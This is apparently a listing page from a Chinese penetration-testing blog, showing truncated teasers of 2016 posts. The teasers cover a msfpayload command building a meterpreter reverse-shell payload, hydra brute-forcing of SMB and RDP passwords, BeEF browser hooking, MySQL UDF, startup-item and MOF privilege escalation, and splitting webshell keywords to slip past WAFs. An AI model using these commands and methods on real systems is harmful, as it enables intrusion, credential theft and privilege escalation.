Eternal 8年前 (2016-08-20) 9405浏览 1评论

00×01 首先，我们先来生成一个 meterpreter 类型的 PALOAD ： msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 X &...

Eternal 8年前 (2016-08-19) 8251浏览 0评论

破解smb服务密码： hydra -l administrator -P pass 192.168.2.3 smb 成功获取密码：123 破解rdp服务密码： hydra -l administrator -P pass 192.168.2.3 ...

Eternal 8年前 (2016-08-18) 5808浏览 0评论

上篇文章我们利用了 ms10-002 的这个 Exploit ，但目前来说它的利用率已经非常低了。因为它的 target 为IE6.0及以下的版本，只要用户按常规升级补丁，基本就很难利用到！今天，继续为大家介绍另一个IE的Exploit 。该EXP可...

Eternal 8年前 (2016-08-17) 11236浏览 2评论

00×01 首先，我们来到beef安装目录下，启动 ./beef 。这里就不做过多讲解了！成功启动后，我们可以在启动界面找到 UI 的登录地址及 hook.js 的文件地址。如下： Hook URL: http://192.168.80.1...

Eternal 8年前 (2016-08-15) 11640浏览 0评论

关于UDF提权，也是现在比较常见的MySQL类提权方式之一。它的提权原理也非常简单！即是利用了root 高权限，创建带有调用cmd的函数的udf.dll动态链接库！这样一来我们就可以利用 system权限进行提权操作了！ 在开始进行UDF提权前，我们...

Eternal 8年前 (2016-08-14) 4327浏览 0评论

关于MySQL的启动项提权，听其名知其意。就是将一段 VBS脚本导入到 ?C:\Documents and Settings\All Users\「开始」菜单\程序\启动 下，如果管理员重启了服务器，那么就会自动调用该脚本，并执行其中的用户添加及提权...

Eternal 8年前 (2016-08-13) 8565浏览 1评论

关于 mof 提权的原理其实很简单，就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件，每分钟都会在一个特定的时间去执行一次的特性，来写入我们的cmd命令使其被带入执行。下面简单演示下 mo...

Eternal 8年前 (2016-08-12) 8295浏览 0评论

话不多说，我们直接操作！ 首先我们通过 webshell 找到 FileZilla 的文件目录，找到 FileZilla Server Interface.xml 文件，打开。我们可以看到它的连接地址：127.0.0.1 及端口：14147，密码这里...

Eternal 8年前 (2016-08-11) 5485浏览 0评论

1.关键字拆分。 ? ?? ?? ?比如assert，可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。 ??? ??...

Eternal 8年前 (2016-08-08) 4127浏览 0评论

00×01安全狗的确是让人很头痛，尤其是在上传一句话或者写入一句话的时候，会被安全狗拦截从而拿不下shell。 当然，安全狗是最简单的一款waf，很容易就进行一个绕过。 00×02 对于绕过安全狗跟360，我姿势不多，但是却很实用...